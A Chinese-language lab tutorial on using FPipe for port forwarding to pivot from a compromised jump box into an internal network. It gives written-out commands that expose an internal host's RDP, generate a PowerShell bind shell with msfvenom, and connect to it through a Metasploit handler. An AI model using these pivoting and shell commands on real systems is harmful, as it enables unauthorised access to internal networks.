forward pipe是一個端口重定向工具,就是可以實作從Internet到區域網路内部機器的特定端口服務的通路,簡單從字面意思來了解即 轉發通過管道,也就是所謂的端口重定向,通過一個管道,把一端端口流量丢給管道的另一端端口。
基礎準備:
本機win10,IP: 192.168.0.2 可以與虛拟機win10通信,不能與虛拟機win12通信
虛拟機 win12 IP: 192.168.5.167 假設是内網中不能出網的一台機器,不能與本機win10通信
虛拟機 win10 IP: 192.168.5.168 内網中的跳闆機,可以與本機win 10,虛拟機win12通信
應用環境:
當入侵一台計算機,發現開了遠端終端而又無法連接配接時,如果在shell裡發現它的IP為内網形式時,就可以使用這個工具來定向,還有當拿下内網一台跳闆機時,可以把内網中不能出網的服務給代出來(例如:遠端連接配接服務,shh等等)。
文章練習目的:
通過在跳闆機執行正向端口轉發,把内網中不能出網的服務給代出來(例如:遠端連接配接服務)。
詳細文法:
FPipe [-hv?] [-brs <port>] IP
-?/-h - shows this help text
-c - maximum number of allowed simultaneous connections. Default is 32 #連接配接的最大數目,預設是32
-l - listening port number #要監聽的TCP端口号
-r - remote TCP port number #要定向到的IP主機的端口号
-s - outbound connection source port number #從哪個端口發出重定向資訊
-v - verbose mode #詳細顯示過程
1.如何利用 fpipe 的 tcp 端口重定向,如,直接通過邊界 殭屍電腦 機器去連目标内網中的那台不能正常連外網 的主機的 rdp
通過目标跳闆機的5555端口來通路内網192.168.5.167主機的rdp服務,
具體如下[正向tcp端口轉發]
FPipe.exe -l 5555 -r 3389 192.168.5.167 -v
入侵者主機執行mstsc 192.168.5.168 5555
輸入内網中不能出網的機器的賬号和密碼
成功轉發,連接配接上内網中不能出網的機器的遠端服務。
2.利用 fpipe 重定向來連接配接我們的 bind 型 meterpreter,以此讓目标内網中一些不能上外網的機器也能正常的上線,具體如下生成powershell執行語句,儲存在shell.txt
msfvenom -p windows/powershell_bind_tcp LPORT=8080 -f raw -o shell.txt
//在殭屍電腦上執行,把不能出網的機器的8080端口轉發到殭屍電腦的8080
# FPipe.exe -l 8080 -i 0.0.0.0 -s 8080 -r 8080 192.168.5.167
把shell.txt的語句複制在cmd或者powershell上執行(無需把shell.txt上傳)
執行完成之後,背景powershell程序會一直反彈shell
最後,回到本地的攻擊機上去 bind 我們的 meterpreter,注意此處要寫 殭屍電腦 機器的 ip, 如期所至,一個 bind 會話正常被彈回
msf > use exploit/multi/handler
msf > set payload windows/powershell_bind_tcp
msf > set lport 5555 #本地端口
msf > set rhost 192.168.5.168 #遠端主機IP(也就是殭屍電腦IP)
msf > exploit
ipconfig 檢視IP,驗證是否是内網中不能出網的機器的powershell
簡單小結:
工具小巧,功能單一,基本不需考慮免殺,使用過程中,注意放開防火牆對指定端口出入站的限制。